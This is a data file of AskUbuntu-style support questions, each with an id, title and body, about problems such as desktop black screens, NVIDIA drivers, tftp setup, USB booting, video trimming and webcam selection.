398634	installed kde onto xubuntu 12.04 , now get black screen after login !	i have a panasonic toughbook cf-19 mk3 that i recently installed xubuntu 12.04 lts on . that install went smoothly and works fine . was looking for more customization , so decided to try kde desktop . used apt-get to install kde 4.8.5 . everything was working fine after install until i rebooted ; once i did that i had login issues ( could n't login , but was using kde login manager - switched it back to xfce login manager and that was solved ) . once i was able to login to a kde session , i got this issue : as soon as i tough any key on the keyboard or the touchpad , the screen goes black for a while . eventually it comes back , but goes black upon key press/touchpad use . i tried editing the compositing line in the .kde/share/config/kwinrc file to enabled=false , then rebooted , but that does n't seem to do anything . i 've spent about 2 hours searching for answers on the internet , but i have not been able to find a solution . anyone have any ideas ? i want to try kde , but this is frustrating ! i 'm relatively new to linux also , and i 'm trying to use linux exclusively now ( no windows ! )
398636	thunderbird : delete emails from certain address	i have the latest thunderbird in 13.04 and certain addresses are spamming my mails . i want each time tb connects to delete mail from those addresses . note that not all junk mails but from specific addresses regardless of where they are ( inbox , junks et al ) . is there a tool i can use for that ? deleting them at startup is becoming a burden . tb 's junk controls do n't work , unless i miss something .
398638	issue with lubuntu . uninstall lubunto . install windows xp	i recently formatted my father 's old laptop and installed lubuntu . he did n't like it and asked me to install windows xp . however , i ca n't seem to boot from the windows xp cd . the laptop just boots in lubuntu . i tried running the autorun with wine , but it did n't work . any tips on what i can do to uninstall lubuntu , or how can i get the machine to boot windows ? thank you .
398640	nano unresponsive when using git commit - ubuntu 12.04	can anyone provide some assistance with nano ? when i do a git commit -a -m `` blah some text '' it brings up the nano editor , but the editor is completely unresponsive to my keyboard commands including any ctrl+ menu commands ? i end up having to close the terminal window ... am stuck atm . thanks !
398641	how to mount without mkdir	very very basic conceptual question . ( obviously from a beginner ) i want to manually mount an internal hard drive . my drive in not mounted . dir /media is empty . i click on the drive in the gui , it mounts . now /media has /media/mydrive mydrive is sda but , to manually mount my drive using mount , i know i am supposed the mkdir mountpoint in advance , so that i can do sudo mount /dev/sda /media/mydrive question : how come if i use the gui , the mountpoint does not need to exist in advance ? if i want to mount my drive in a script , do i absolutely must mkdir /media/mydrive in advance ? many thanks for clarifying a newbie misunderstanding .
398643	ubuntu-lampp php path issue	i use ubuntu 13.10 and lampp . when i try to run sudo php artisan job-daemon i get the above message . but when i run php artisan job-daemon it works just fine . php -m gives me the following : [ php modules ] bcmath bz2 calendar core ctype curl date dba dom ereg exif fileinfo filter ftp gd gettext hash iconv imap intl json ldap libxml mbstring mcrypt mhash mssql mysql mysqli mysqlnd openssl pcntl pcre pdo pdo_mysql pdo_pgsql pdo_sqlite phar posix reflection session shmop simplexml soap sockets spl sqlite3 standard sybase_ct sysvsem sysvshm tokenizer wddx xml xmlreader xmlwriter xsl zip zlib [ zend modules ] which php gives me the following : /opt/lampp/bin/php why do i get the message missing then ? i ran johnnemo @ johnnemo : ~ $ sudo nano .bashhrc i added export path= $ path : /opt/lampp/bin/php but still no luck ... .any ideas.. ? $ path and sudo $ path : sudo : /opt/lampp/bin : /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games : command not found johnnemo @ johnnemo : ~ $ $ path bash : /opt/lampp/bin : /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games : no such file or directory
398646	how can i change the logo that comes up when i boot my laptop ( before grub )	my manufacturer 's logo , lenovo , comes up as soon i press the power button . it is in the very first stages of boot , before the grub2 screen . i suspect it is stored in the bios but i have no idea where to find the image file . i just want to know where that image is kept so i can edit it . i am on a lenovo u310 running many linux distros including ubuntu 13.10 .
398654	minecraft launcher crashing	i just downloaded minecraft on ubuntu 12.04 lts . the launcher opens , but when i click play , it crashes and reopens with this error report . -- -- minecraft crash report -- -- // surprise ! haha . well , this is awkward . time : 1/1/14 12:31 pm description : initializing game org.lwjgl.lwjglexception : could not init glx at org.lwjgl.opengl.linuxdisplaypeerinfo.initdefaultpeerinfo ( native method ) at org.lwjgl.opengl.linuxdisplaypeerinfo. < init > ( linuxdisplaypeerinfo.java:61 ) at org.lwjgl.opengl.linuxdisplay.createpeerinfo ( linuxdisplay.java:818 ) at org.lwjgl.opengl.drawablegl.setpixelformat ( drawablegl.java:61 ) at org.lwjgl.opengl.display.create ( display.java:846 ) at org.lwjgl.opengl.display.create ( display.java:757 ) at org.lwjgl.opengl.display.create ( display.java:739 ) at azi.ad ( sourcefile:325 ) at azi.f ( sourcefile:696 ) at net.minecraft.client.main.main.main ( sourcefile:152 ) a detailed walkthrough of the error , its code path and all known details is as follows : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - -- head -- stacktrace : `at org.lwjgl.opengl.linuxdisplaypeerinfo.initdefaultpeerinfo ( native method ) at org.lwjgl.opengl.linuxdisplaypeerinfo. < init > ( linuxdisplaypeerinfo.java:61 ) at org.lwjgl.opengl.linuxdisplay.createpeerinfo ( linuxdisplay.java:818 ) at org.lwjgl.opengl.drawablegl.setpixelformat ( drawablegl.java:61 ) at org.lwjgl.opengl.display.create ( display.java:846 ) at org.lwjgl.opengl.display.create ( display.java:757 ) at org.lwjgl.opengl.display.create ( display.java:739 ) at azi.ad ( sourcefile:325 ) ` -- initialization -- details : stacktrace : `at azi.f ( sourcefile:696 ) at net.minecraft.client.main.main.main ( sourcefile:152 ) ` -- system details -- details : `minecraft version : 1.7.4 operating system : linux ( i386 ) version 3.5.0-23-generic java version : 1.6.0_27 , sun microsystems inc. java vm version : openjdk server vm ( mixed mode ) , sun microsystems inc. memory : 34158592 bytes ( 32 mb ) / 55836672 bytes ( 53 mb ) up to 477233152 bytes ( 455 mb ) jvm flags : 1 total ; -xmx512m aabb pool size : 0 ( 0 bytes ; 0 mb ) allocated , 0 ( 0 bytes ; 0 mb ) used intcache : cache : 0 , tcache : 0 , allocated : 0 , tallocated : 0 launched version : 1.7.4 lwjgl : 2.9.1 opengl : ~~error~~ runtimeexception : no opengl context found in the current thread . gl caps : is modded : probably not . jar signature remains and client brand is untouched . type : client ( map_client.txt ) resource packs : [ ] current language : ~~error~~ nullpointerexception : null profiler position : n/a ( disabled ) vec3 pool size : ~~error~~ nullpointerexception : null anisotropic filtering : off ( 1 ) how can i fix the error ?
398655	need help with tftpd-hpa configs on ubuntu server 12.04.3 lts	i installed a tftp server on ubuntu server 12.04.3 lts with the following command line : sudo apt-get install tftpd-hpa i changed the /etc/default/tftp-hpa file with the following configs : tftp_username= '' tftp '' tftp_directory= '' /srv/tftp '' tftp_address= '' 0.0.0.0:69 '' tftp_options= '' -- secure -- create '' i created a user called tftp with the following command sudo adduser tftp i created the tftp folder sudo mkdir /srv/tftp sudo chown nobody : nogroup /srv/tftp sudo chmod 777 /srv/tftp i restarted the service with sudo service tftpd-hpa restart but when i tried to tftp some files from a remote computer , im getting time out response . it just only copied empty files . with both put and get commands . can someone help me to figure out what i 'm doing wrong ? ? ? ?
398657	i ca n't open the mounted folder with curlftpfs	i mount my files with curlftpfs , but when it 's done i ca n't open the folder where i mounted the ftp drive . it says that i do n't have the permission . what can i do with it ?
398659	ubuntu 13.10 + nvidia 173 ( dell precision m60 ) - black screen , can not boot	i upgraded a dell precision m60 which uses a nvidia gpu quadro fx go1000 ( nv36gl ) graphics card from ubuntu 13.04 to 13.10 today and now i can not boot . starting x flashes an nvidia logo briefly and then brings up a black screen and the keyboard is unresponsive - even ctrl + alt + f1 to bring up a terminal login / window does not work . i am using the nvidia-173 drivers ( 173.14.37-0ubuntu4 ) - nvidia-current does not work on this graphics card as it is not supported . an earlier driver present on 13.04 , nvidia-173-updates , no longer appears to exist . i have followed instructions in other threads such as ubuntu 13.04 - installation nvidia driver and completely uninstalled all nvidia drivers and x , and reinstalled it . same problem . i have n't followed instructions to install nvidia-current as i know this brings up a `` not supported - use nvidia-173 '' message as follows [ 44.659 ( ww ) nvidia ( 0 ) : the nvidia quadro fx go1000 gpu installed in this system is [ 44.659 ( ww ) nvidia ( 0 ) : supported through the nvidia 173.14.xx legacy drivers . [ 44.659 ( ww ) nvidia ( 0 ) : please visit http : //www.nvidia.com/object/unix.html for [ 44.659 ( ww ) nvidia ( 0 ) : more information . the 304.88 nvidia driver will ignore [ 44.659 ( ww ) nvidia ( 0 ) : this gpu . continuing probe ... . the only way to recover is to boot into recovery mode and drop into a root shell prompt . i can access the laptop via ssh once x is loaded to do diagnostics . running x remotely gets as far as running the nv_control module , then gives up if i remove all nvidia drivers completely using apt-get remove -- purge nvidia* , x picks up the vesa driver and boots into 640x480 . i do n't have an xorg.conf present and the relevant bit of the most recent xorg.0.log is as follows [ 50.717 ] ( ii ) loadmodule : `` glx '' [ 50.717 ] ( ii ) loading /usr/lib/i386-linux-gnu/xorg/extra-modules/libglx.so [ 51.064 ] ( ii ) module glx : vendor= '' nvidia corporation '' [ 51.064 ] compiled for 4.0.2 , module version = 1.0.0 [ 51.064 ] module class : x.org server extension [ 51.064 ] ( ii ) nvidia glx module 173.14.37 wed mar 6 17:14:50 pst 2013 [ 51.064 ] loading extension glx [ 51.064 ] ( == ) matched nvidia as autoconfigured driver 0 [ 51.064 ] ( == ) matched nouveau as autoconfigured driver 1 [ 51.064 ] ( == ) matched vesa as autoconfigured driver 2 [ 51.064 ] ( == ) matched modesetting as autoconfigured driver 3 [ 51.064 ] ( == ) matched fbdev as autoconfigured driver 4 [ 51.064 ] ( == ) assigned the driver to the xf86configlayout [ 51.064 ] ( ii ) loadmodule : `` nvidia '' [ 51.064 ] ( ii ) loading /usr/lib/i386-linux-gnu/xorg/extra-modules/nvidia_drv.so [ 51.065 ] ( ii ) module nvidia : vendor= '' nvidia corporation '' [ 51.065 ] compiled for 4.0.2 , module version = 1.0.0 [ 51.065 ] module class : x.org video driver [ 51.065 ] ( ii ) loadmodule : `` nouveau '' [ 51.066 ] ( ii ) loading /usr/lib/xorg/modules/drivers/nouveau_drv.so [ 51.095 ] ( ii ) module nouveau : vendor= '' x.org foundation '' [ 51.095 ] compiled for 1.14.2.901 , module version = 1.0.9 [ 51.095 ] module class : x.org video driver [ 51.095 ] abi class : x.org video driver , version 14.1 [ 51.095 ] ( ii ) loadmodule : `` vesa '' [ 51.096 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 51.096 ] ( ii ) module vesa : vendor= '' x.org foundation '' [ 51.096 ] compiled for 1.14.1 , module version = 2.3.2 [ 51.096 ] module class : x.org video driver [ 51.096 ] abi class : x.org video driver , version 14.1 [ 51.096 ] ( ii ) loadmodule : `` modesetting '' [ 51.096 ] ( ii ) loading /usr/lib/xorg/modules/drivers/modesetting_drv.so [ 51.114 ] ( ii ) module modesetting : vendor= '' x.org foundation '' [ 51.114 ] compiled for 1.14.1 , module version = 0.8.0 [ 51.115 ] module class : x.org video driver [ 51.115 ] abi class : x.org video driver , version 14.1 [ 51.115 ] ( ii ) loadmodule : `` fbdev '' [ 51.115 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 51.117 ] ( ii ) module fbdev : vendor= '' x.org foundation '' [ 51.117 ] compiled for 1.14.1 , module version = 0.4.3 [ 51.117 ] module class : x.org video driver [ 51.117 ] abi class : x.org video driver , version 14.1 [ 51.117 ] ( ii ) nvidia dlloader x driver 173.14.37 wed mar 6 17:02:37 pst 2013 [ 51.117 ] ( ii ) nvidia unified driver for all supported nvidia gpus [ 51.117 ] ( ii ) nouveau driver date : wed jul 31 10:51:03 2013 +1000 [ 51.117 ] ( ii ) nouveau driver for nvidia chipset families : [ 51.117 ] riva tnt ( nv04 ) [ 51.117 ] riva tnt2 ( nv05 ) [ 51.117 ] geforce 256 ( nv10 ) [ 51.117 ] geforce 2 ( nv11 , nv15 ) [ 51.117 ] geforce 4mx ( nv17 , nv18 ) [ 51.117 ] geforce 3 ( nv20 ) [ 51.118 ] geforce 4ti ( nv25 , nv28 ) [ 51.118 ] geforce fx ( nv3x ) [ 51.118 ] geforce 6 ( nv4x ) [ 51.118 ] geforce 7 ( g7x ) [ 51.118 ] geforce 8 ( g8x ) [ 51.118 ] geforce gtx 200 ( nva0 ) [ 51.118 ] geforce gtx 400 ( nvc0 ) [ 51.118 ] ( ii ) vesa : driver for vesa chipsets : vesa [ 51.118 ] ( ii ) modesetting : driver for modesetting kernel drivers : kms [ 51.118 ] ( ii ) fbdev : driver for framebuffer : fbdev [ 51.118 ] ( ++ ) using vt number 7 [ 51.120 ] ( ii ) loading sub module `` fb '' [ 51.120 ] ( ii ) loadmodule : `` fb '' [ 51.120 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 51.120 ] ( ii ) module fb : vendor= '' x.org foundation '' [ 51.120 ] compiled for 1.14.3 , module version = 1.0.0 [ 51.120 ] abi class : x.org ansi c emulation , version 0.4 [ 51.120 ] ( ii ) loading sub module `` wfb '' [ 51.120 ] ( ii ) loadmodule : `` wfb '' [ 51.120 ] ( ii ) loading /usr/lib/xorg/modules/libwfb.so [ 51.121 ] ( ii ) module wfb : vendor= '' x.org foundation '' [ 51.121 ] compiled for 1.14.3 , module version = 1.0.0 [ 51.121 ] abi class : x.org ansi c emulation , version 0.4 [ 51.121 ] ( ii ) loading sub module `` ramdac '' [ 51.121 ] ( ii ) loadmodule : `` ramdac '' [ 51.121 ] ( ii ) module `` ramdac '' already built-in [ 51.121 ] ( ww ) falling back to old probe method for vesa [ 51.121 ] ( ww ) falling back to old probe method for modesetting [ 51.121 ] ( ee ) open /dev/dri/card0 : no such file or directory [ 51.121 ] ( ww ) falling back to old probe method for fbdev [ 51.121 ] ( ii ) loading sub module `` fbdevhw '' [ 51.121 ] ( ii ) loadmodule : `` fbdevhw '' [ 51.121 ] ( ii ) loading /usr/lib/xorg/modules/libfbdevhw.so [ 51.135 ] ( ii ) module fbdevhw : vendor= '' x.org foundation '' [ 51.136 ] compiled for 1.14.3 , module version = 0.0.2 [ 51.136 ] abi class : x.org video driver , version 14.1 [ 51.136 ] ( ee ) open /dev/fb0 : no such file or directory [ 51.136 ] ( ii ) nvidia ( 0 ) : creating default display subsection in screen section `` default screen section '' for depth/fbbpp 24/32 [ 51.136 ] ( == ) nvidia ( 0 ) : depth 24 , ( == ) framebuffer bpp 32 [ 51.136 ] ( == ) nvidia ( 0 ) : rgb weight 888 [ 51.136 ] ( == ) nvidia ( 0 ) : default visual is truecolor [ 51.136 ] ( == ) nvidia ( 0 ) : using gamma correction ( 1.0 , 1.0 , 1.0 ) [ 51.136 ] ( ** ) nvidia ( 0 ) : enabling render acceleration [ 51.136 ] ( ii ) nvidia ( 0 ) : support for glx with the damage and composite x extensions is [ 51.136 ] ( ii ) nvidia ( 0 ) : enabled . [ 52.407 ] ( ii ) nvidia ( 0 ) : nvidia gpu quadro fx go1000 ( nv36gl ) at pci:1:0:0 ( gpu-0 ) [ 52.407 ] ( -- ) nvidia ( 0 ) : memory : 131072 kbytes [ 52.407 ] ( -- ) nvidia ( 0 ) : videobios : 04.36.20.30.d1 [ 52.407 ] ( ii ) nvidia ( 0 ) : detected agp rate : 4x [ 52.407 ] ( -- ) nvidia ( 0 ) : interlaced video modes are supported on this gpu [ 52.407 ] ( -- ) nvidia ( 0 ) : connected display device ( s ) on quadro fx go1000 at pci:1:0:0 : [ 52.407 ] ( -- ) nvidia ( 0 ) : sharp ( dfp-0 ) [ 52.407 ] ( -- ) nvidia ( 0 ) : sharp ( dfp-0 ) : 300.0 mhz maximum pixel clock [ 52.407 ] ( -- ) nvidia ( 0 ) : sharp ( dfp-0 ) : internal dual link lvds [ 52.408 ] ( ii ) nvidia ( 0 ) : assigned display device : dfp-0 [ 52.408 ] ( == ) nvidia ( 0 ) : [ 52.408 ] ( == ) nvidia ( 0 ) : no modes were requested ; the default mode `` nvidia-auto-select '' [ 52.408 ] ( == ) nvidia ( 0 ) : will be used as the requested mode . [ 52.408 ] ( == ) nvidia ( 0 ) : [ 52.408 ] ( ii ) nvidia ( 0 ) : validated modes : [ 52.408 ] ( ii ) nvidia ( 0 ) : `` nvidia-auto-select '' [ 52.408 ] ( ii ) nvidia ( 0 ) : virtual screen size determined to be 1920 x 1200 [ 52.408 ] ( -- ) nvidia ( 0 ) : dpi set to ( 147 , 145 ) ; computed from `` useediddpi '' x config [ 52.408 ] ( -- ) nvidia ( 0 ) : option [ 52.408 ] ( ww ) nvidia ( 0 ) : ubb is incompatible with the composite extension . disabling [ 52.408 ] ( ww ) nvidia ( 0 ) : ubb . [ 52.408 ] ( == ) nvidia ( 0 ) : enabling 32-bit argb glx visuals . [ 52.408 ] ( ii ) unloadmodule : `` nouveau '' [ 52.408 ] ( ii ) unloading nouveau [ 52.409 ] ( ii ) unloadmodule : `` vesa '' [ 52.409 ] ( ii ) unloading vesa [ 52.409 ] ( ii ) unloadmodule : `` modesetting '' [ 52.409 ] ( ii ) unloading modesetting [ 52.409 ] ( ii ) unloadmodule : `` fbdev '' [ 52.409 ] ( ii ) unloading fbdev [ 52.409 ] ( ii ) unloadsubmodule : `` fbdevhw '' [ 52.409 ] ( ii ) unloading fbdevhw [ 52.409 ] ( -- ) depth 24 pixmap format is 32 bpp [ 52.412 ] ( ii ) nvidia ( 0 ) : initialized agp gart . [ 52.415 ] ( ww ) nvidia ( 0 ) : failed to determine power source of the system : unable to [ 52.415 ] ( ww ) nvidia ( 0 ) : find ac state file under /proc/acpi/ac_adapter/ [ 52.416 ] ( ii ) nvidia ( 0 ) : setting mode `` nvidia-auto-select '' [ 52.653 ] loading extension nv-glx [ 52.705 ] ( ii ) nvidia ( 0 ) : nvidia 3d acceleration architecture initialized [ 52.708 ] ( ii ) nvidia ( 0 ) : using the nvidia 2d acceleration architecture [ 52.708 ] ( == ) nvidia ( 0 ) : backing store disabled [ 52.708 ] ( == ) nvidia ( 0 ) : silken mouse enabled [ 52.708 ] ( == ) nvidia ( 0 ) : dpms enabled [ 52.708 ] loading extension nv-control [ 52.708 ] ( == ) randr enabled [ 52.720 ] ( ii ) selinux : disabled on system [ 52.721 ] ( ii ) initializing extension glx
398661	clearing os cache	i 'm guessing that 's what it is . i reinstalled ubuntu and replaced my newly created home directory with my old home directory . problem is , my new ubuntu does n't have xyz program installed and when i double click a file it attempts to open it with xyz program . how do i 'reset ' my home partition so that it wo n't use non-existent programs ? specifically , its wine . it wants me to open files with internet explorer and notepad .
398663	what does `` unable to read edid for display device '' mean ?	today i checked my system logs and i found a spam of this line : [ 11972.301 ] ( ww ) nvidia ( gpu-0 ) : unable to read edid for display device crt-0 im on an acer aspire 5742g laptop with nvidia geforce gt540m graphics card .
398665	bumblebee 's optirun command was working fine , then suddenly it does nothing anymore	i installed bumblebee today on my dell laptop ( i3 2370 + gf630m ) to play doom , using doomsday . i tested the `` optirun '' command with firefox , then with doomsday and all was working fine . now however , when i type `` optirun doomsday '' or `` optirun firefox '' in the terminal , literally nothing happens . no error message , the process just hangs for eternity , unless i terminate it . any ideas ?
398666	execute sh script from *.desktop file ?	what i want to do at all , is that : create script that has icon on it . so i know only one way - file.desktop file with icon . settings icon on it was successful , but i have no luck setting exec value : / can someone explain me a bit how to create executable script with icon on it ? create .desktop file and link it to that script ? can someone give me structure of that .desktop file ?
398672	do i also need to set up another iptables rules for ipv6 if i just used iptables ?	say i have a firewall setup on my linux server with iptables so that i only accept port 22 and port 80 traffic and i block access to all other ports . do these rules only work if the client machine is using a ipv4 address ? so if an ipv6 address is used , the client can access ports i do n't want them to ? ( ie ports other than port 22 and port 80 )
398675	window controls missing ; can not maximise or minimize applications - make fix permanent	i have the issue discussed here : window controls missing ; can not maximise or minimize applications - . i have this problem for one of the users on my ubuntu 12.04 install ( installed 1.5 years ago ) . the problem has only recently appeared . the solution that worked for me is one supplied in the question i reference `` compiz -- replace & '' my only problem is that this solution is only active for the current login session . the system reverts to the broken behaviour when the user re-logs on . how can one make this solution permanent ? ps i am running a gnome classic desktop as per these instructions
398676	ca n't boot 13.10 from usb	i 'm trying to install 13.10 ( atm im on 12.04 ) , but this is where i get stuck all the time after booting from usb : im using unetbootin to put ubuntu on usb , i tried also redownloading the iso a few times but same problem happen all the time . i was able to boot 13.10 in the past but now i cant . any ideas ?
398682	base ubuntu 13.10 fails to install from a usb drive	i am trying to install ubuntu 13.10 from an external usb hard drive and install fails due to a wireless kernal driver b43 error . the laptop is an old acer aspirer 3000
398686	what is the equivalent to the windows `` term232 '' program ?	what is the equivalent to the windows `` term232 '' program ? i am running ubuntu 12.04 .
398689	installed virtualbox guest additions on host	i just ran : sudo apt-get install virtualbox-guest-additions-iso on my host ( ubuntu 13.10 ) . i was hoping to get a copy of the iso file , but i 'm afraid that it may have installed the guest additions on my host machine . the only problem that i have seen ( so far ) is that virtualbox has lost all of my virtual machines . the directories and files are still there , but virtualbox does not see them . have i messed up my host os by installing guest additions on it ? is there a way to get back my virtual machines ?
398694	installing ubuntu to my windows 8 tablet pc	i bought a samsung tablet pc and there comes windows 8 at the beginning of my tablet pc i want to install latest ubuntu version and delete windows totally but when i am trying to install ubuntu while i am rebooting my pc its giving me a error . please help me . i love ubuntu and i want to use it so much
398696	why ca n't i install ubuntu ( via usb ) on my machine after upgrading to windows 7 ?	my legacy pentium 4 computer ran windows xp professional 32-bit a few months ago , which i later tried ( and succesfully ) duel-booted with ubuntu as the second os . i then cleared both operating systems when i installed windows 7 ultimate 32-bit . now i want to install ubuntu once more but it simply will not boot for me ! i changed the first boot option to usb instead of the hard drive , i even selected the boot from usb option multiple times . i 've tried installing on both a limited account running the program in elevated rights and on my fully administrative account . i 've installed multiple iso files , extracted multiple different ways , even ran two different programs that claimed to boot ubuntu ( unetbootin-windows-585.exe , universal-usb-installer-1.9.5.1.exe ) lastly , i tried to use the windows install ( wubi.exe ) method twice ( one with internet connection , one without , and both had a copy of the iso in the same folder ) but got this : http : //puu.sh/65xab.png to test that it was n't just ubuntu , i also tried to boot into sabayon linux via the same application ( universal-usb-installer-1.9.5.1.exe ) . both boot into windows instead of their os , despite having the usb plugged with their respective data . i also put the flash drive in the same usb port that i used for my xp install ( and took out all my other usb flash drives ) to no avail . i was able to boot into ubuntu using the usb method when this computer had xp , but now it does n't with 7 ? can someone help me ?
398697	alt and tab isnt working	since some time i noticed a problem with alt+tab , it didnt work on 12.04 and now doesnt work on fresh 13.10 . my keyboard is obviously 100 % working . thank you
398700	running windows 7 in ubuntu 13.10	i have an ubuntu 13.10/windows 7 dual boot set up . i am trying to figure out how to access my programs from the windows partition , like ms office , skype , etc. , through ubuntu . can anyone help with this ? thanks in advance ! drakiras
398702	certified component for dell r720xd	i see `` the dell poweredge r720xd server with the components described below has been awarded the status of certified for ubuntu . '' however , there are many more user selectable components that are not shown on this page . http : //www.ubuntu.com/certification/hardware/201205-10988/ for example , there are many different choice of cpus ( e.g . the following one ) . intel速 xeon速 e5-2620 v2 2.10ghz , 15m cache , 7.2gt/s qpi , turbo , ht , 6c , 80w , max mem 1600mhz udimm , rdimm of different spec . h710p vs h710 raid controller broadcom 57800 2x10gb bt + 2x1gb bt network daughter card does anybody know how to find the certification status for additional components to dell r720xd ?
398704	how do i crop ( time not picture ) an mp4 video file	i 'll be the first to admit i am a long way from an expert in non linear video encoding techniques , but i am looking for an app to help me chop bits off start and end of an mp4 file efficiently and losslessly . e.g . is there something that lets me find a keyframe and copy the lot between that and another keyframe , without needing to re-encode the lot ( slow and lossy ) , and without losing av sync ? by mp4 , i mean h264 video + aac audio in an mp4 container pre h264 days avidemux was an excellent tool for this as you can reuse the original encoded streams meaning no loss and take just a few seconds to create the trimmed version , but it is hopeless with h264 - opening one gives you two options : use safe mode ( which loses av sync massively ) or use the dangerous mode which immediately crashes it . afaik , openshot , kdenlive , pitivi etc . will all do this by decoding and recoding ( slow and lossy ) . seems a simple thing ( probably showing my lack of knowledge here ! ) , so was wondering if i 'm missing something .
398705	ubuntu 13.04 rfreeze on any video	i think my computer it is really messed up : problem 1 : whenever i try to watch a video it freezes and after 30 sec starts printing a lot of text and closes the the session ; problem 2 : when i try to upgrade from 13.04 to 13.10 i get : an unresolvable problem occurred while calculating the upgrade . this can be caused by : * upgrading to a pre-release version of ubuntu * running the current pre-release version of ubuntu * unofficial software packages not provided by ubuntu i do not know if the two problems are related in some way , but the the first one is the most serious to me , what should i do to fix my system , before i upgrade ?
398706	installation on a wiped computer	i want to install ubuntu to an old dell latitude d630 that is completely wiped . it has no operating system on it . how can i install an operating system on it with out switching to ubuntu on my windows desktop ? every download it seams as if it wants me to switch to ubuntu . i have a gateway with windows on it that i do n't need ubuntu for . is there a way i can get the operating system and put it on a flash drive and boot it on my old laptop ?
398709	first login textbox can not be seen on connection screen of the ltsp thin clients	i have installed a edubuntu 10.04.3 on a private network . i have a disk-less thin client which resolution is 1280x1024 . i use ldm session manager . i do not have ldm-edubuntu-theme package installed on thin client side ( /opt/islp/i386/ ... ) . i note that the first time username and login is asked , the caption box does not appears on the screen . but it appears without specific configuration at the second trial ( non blank invalid username and password or session logout ) . how can i make it appears at the first time ? i have already tried to change the background image bg.png to the correct size , x_size=1280x1024 , x_xrandr_size=1280x1024 and do not like the bad autologin argument ldm_autologon=nouser .
398710	concerning ubuntu touch	what kinds of phones will work with ubuntu touch ? would a t mobile my touch work ? i have linux mint 14 does it work well with ubuntu touch or should i consider switching my computer over to ubuntu as well ? i will only consider getting a computer phone if i can install a linux os on it .
398711	no way to select os	pls i am very new to ubuntu and after installing it from a wubi via a usb disk alongside windows 8 my system automatically still boots windows 8 , i then have to quickly press the esc key go to boot manager and then notebook hard drive before i can access grub and access ubuntu ... ... ... .. pls if anyone can help so i either get a grub on startup or the windows 8 blue screen selection choice menu like in the link ... ... . i sincerely have tried many options like typing a bunch of codes in terminal and the ( sudo update-grub ) which keeps giving me an error message saying unterminated quote d string ... ... ... ... ... ... ps : secure mode is disabled ... ... any help will be appreciated
398712	sudo or gksu for launching sublime text 2 ?	i am new to using ubuntu 12.04 and noticed two different ways of launching sublime text 2 via terminal window , first being sudo and the other being gksu . upon using both i noticed it 's launching different instances of sublime text 2 with different instances of files loaded that i 've opened on both including saving snippets . launching with gksu saves the snippets into root/etc/etc and sudo saves them into the home/user/etc/etc . what is the preferable way to launch sublime text 2 in the terminal window ? sudo or gksu and why ?
398713	sony vaio pro 13 - does every feature works running ubuntu ?	i am planning to buy a sony vaio pro 13 model svp13217pbs due to the issues that this model has with the wifi card , i got a little bit scared of buying it . apparently these issues have been solved after a driver update , but there are some people that still could not solve that problem . i 'd like to install ubuntu along with win8 ( original os ) . i read some tutorials to accomplish the dual boot , but i was wondering if all the features ( touchscreen , wifi , bluetooth , usb , hdmi , nfc , webcam , microphone , etc ) will work under ubuntu 12.04 or 13.10 hope someone can help me . happy new year !
398714	recuperar arquivos ubuntu 12.04	i have an ubuntu 12.04 which freezes with a black screen during start-up . this started to happen after an upgrade . i tried to use the live-cd to recover my files but failed as the partition is encripted . how can i recover my data from the encrypted drive ? or is there any known cause for black screens at start-up due to recent updates ?
398717	can anyone explain or walk me through this posted answer on a thread i found regarding my problem ?	i 'm having trouble making my usb camera my default webcam . i have it selected in multimedia selector as default , yet my laptop camera is activated when i open guvcview or g+ hangouts , and when i ran sudo modprobe -r uvcvideo then opened guvcview , nothing worked . to get my usb camera to work , i open guvcview , then select device `` hd logitech c920 '' then click `` restart '' and the camera works great . so i came across this answer to a similar thread , which takes the approach of disabling my laptop/built in camera all together . problem is , his answer is not based on example , but generic assumptions . i have no idea how to customize the command for my particular laptop camera . i 'm just not that experienced in ubuntu right now . here 's the thread : http : //askubuntu.com/a/221660/192473 the readout to my lsusb is bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 04f2 : b289 chicony electronics co. , ltd bus 002 device 005 : id 046d:082d logitech , inc . i believe the one i want to disable is device 003 chicony electronics ( toshiba partner ) logitech is my usb camera that i want activated on start-up . the readout to lsusb -t / : bus 02.port 1 : dev 1 , class=root_hub , driver=ehci-pci/2p , 480m |__ port 1 : dev 2 , if 0 , class=hub , driver=hub/6p , 480m |__ port 2 : dev 5 , if 0 , class='binterfaceclass 0x0e not yet handled ' , driver=uvcvideo , 480m |__ port 2 : dev 5 , if 1 , class='binterfaceclass 0x0e not yet handled ' , driver=uvcvideo , 480m |__ port 2 : dev 5 , if 2 , class=audio , driver=snd-usb-audio , 480m |__ port 2 : dev 5 , if 3 , class=audio , driver=snd-usb-audio , 480m / : bus 01.port 1 : dev 1 , class=root_hub , driver=ehci-pci/2p , 480m |__ port 1 : dev 2 , if 0 , class=hub , driver=hub/6p , 480m |__ port 4 : dev 3 , if 0 , class='binterfaceclass 0x0e not yet handled ' , driver=uvcvideo , 480m |__ port 4 : dev 3 , if 1 , class='binterfaceclass 0x0e not yet handled ' , driver=uvcvideo , 480m i 'm taking a guess that i want to focus on port 4 ? but you see in his answer , he has generic code ( 1-6/id { vendor , product } ) and so i ca n't figure out the substitution for my specific model . what is 1-6 referring to etc ? windows 7 and ubuntu 12.04 lts on toshiba satellite l755 memory : 3.8 gib processor : intel® core™ i5-2410m cpu @ 2.30ghz × 4 graphics : intel® sandybridge mobile os-type 64bit disk : 40.2 gb gstreamer/ guvcview/ qt v4l2 test utilty/ video for linux control panel/ multimedia selector installed .
